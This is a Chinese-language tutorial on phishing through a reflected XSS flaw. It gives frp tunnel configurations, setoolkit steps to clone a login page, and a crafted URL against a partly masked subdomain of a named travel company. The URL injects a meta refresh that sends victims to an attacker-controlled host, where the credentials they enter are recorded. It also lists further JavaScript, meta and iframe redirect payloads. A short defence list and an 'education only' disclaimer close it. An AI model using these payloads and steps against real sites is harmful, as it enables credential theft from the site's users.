拎着xss去钓鱼
字数 943 2025-08-18 11:38:28
利用XSS漏洞进行钓鱼攻击的详细教学文档
1. 概述
本教学文档详细介绍了如何利用反射型XSS漏洞进行钓鱼攻击的技术方法。通过结合XSS漏洞、内网穿透工具和钓鱼页面生成工具,实现有效的钓鱼攻击。
2. 所需工具
- frp - 内网穿透工具,用于将本地Kali环境暴露到公网
- setoolkit (Social Engineering Toolkit) - 钓鱼页面生成工具
- 存在XSS漏洞的网站 - 文档中以携程某分站为例
3. 详细步骤
3.1 frp配置
服务器端配置 (VPS)
[common]
bind_port = 7000
客户端配置 (Kali)
[common]
server_addr = x.x.x.x # VPS IP地址
server_port = 7000
[web]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 8080
说明:将Kali的80端口映射到VPS的8080端口,使钓鱼页面可通过互联网访问。
3.2 使用setoolkit生成钓鱼页面
- 启动setoolkit:
setoolkit - 选择攻击类型:
1) 社会工程学攻击 - 选择网页攻击:
2) 网页攻击 - 选择钓鱼网站攻击:
3) 钓鱼网站攻击 - 选择网站克隆:
2) 网站克隆 - 输入接收数据的IP地址(默认即可)
- 输入要克隆的网站URL(示例:
http://xxxxx.ctrip.com/hotel-supplier-ebookingapp/Home/Login.aspx)
3.3 利用XSS漏洞进行钓鱼
构造恶意URL(以携程分站为例):
https://xxxx.ctrip.com/Package_Vendor_Vbooking/UserManagement/ResetPwd.aspx?n=qingdao%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A%2f%2fx.x.x.x:8080%22%3E
技术原理:
- 利用
n参数存在的XSS漏洞 - 注入
<meta>标签实现自动跳转 content="0;url=http://x.x.x.x:8080"表示立即跳转到钓鱼页面
3.4 其他URL跳转测试语句
-
JavaScript跳转:
window.location.href="top.jsp"; self.location='top.htm'; window.location.replace("http://www.example.com/"); top.location='xx.jsp'; -
Meta标签跳转:
<meta http-equiv="refresh" content="20"> <meta http-equiv="refresh" content="0;url=http://example.com"> -
iframe加载:
<iframe src="http://www.example.com/img/tide.png"></iframe>
4. 攻击流程总结
- 识别目标网站存在的反射型XSS漏洞
- 使用setoolkit克隆目标登录页面
- 配置frp将钓鱼页面暴露到公网
- 构造包含XSS payload的恶意URL
- 诱导用户点击恶意URL
- 用户浏览器执行XSS代码,自动跳转到钓鱼页面
- 用户输入凭据后被记录
5. 防御措施
- 对所有用户输入进行严格的过滤和转义
- 实施内容安全策略(CSP)
- 设置HttpOnly和Secure标志的cookie
- 对敏感操作实施二次验证
- 教育用户识别可疑URL
6. 法律声明
本技术文档仅用于教育目的和安全研究。未经授权的渗透测试和攻击行为可能违反法律。请在法律允许范围内使用这些知识。